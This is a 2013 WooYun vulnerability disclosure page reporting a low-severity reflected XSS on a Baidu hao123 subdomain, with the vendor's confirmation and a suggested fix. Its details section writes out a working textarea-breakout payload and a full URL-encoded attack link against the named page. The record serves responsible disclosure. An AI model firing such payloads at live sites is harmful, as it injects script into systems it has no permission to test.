当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027698

漏洞标题:百度hao123一处xss漏洞

相关厂商:百度

漏洞作者: Nicky

提交时间:2013-07-04 12:00

修复时间:2013-08-18 12:01

公开时间:2013-08-18 12:01

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-04: 细节已通知厂商并且等待厂商处理中
2013-07-04: 厂商已经确认,细节仅向厂商公开
2013-07-14: 细节向核心白帽子及相关领域专家公开
2013-07-24: 细节向普通白帽子公开
2013-08-03: 细节向实习白帽子公开
2013-08-18: 细节向公众公开

简要描述:

百度hao123一处xss漏洞

详细说明:

xss测试语句:"></textarea><img src=x onerror=alert(1) />
问题站点:http://wyyx.hao123.com/game_all.xhtml
xss链接:http://wyyx.hao123.com/full_search.xhtml?word=%22%3E%3C%2Ftextarea%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

漏洞证明:

QQ截图20130704115312.png


QQ截图20130704115335.png


修复方案:

过滤输出

版权声明:转载请注明来源 Nicky@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-07-04 13:47

厂商回复:

感谢提交,该漏洞我们已从其他渠道得知,故给予1分!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-04 13:16 | Nicky ( 普通白帽子 | Rank:477 漏洞数:69 | http://www.droidsec.cn 安卓安全中文站)

    @疯狗 。。。好像我提交的时候没这个存字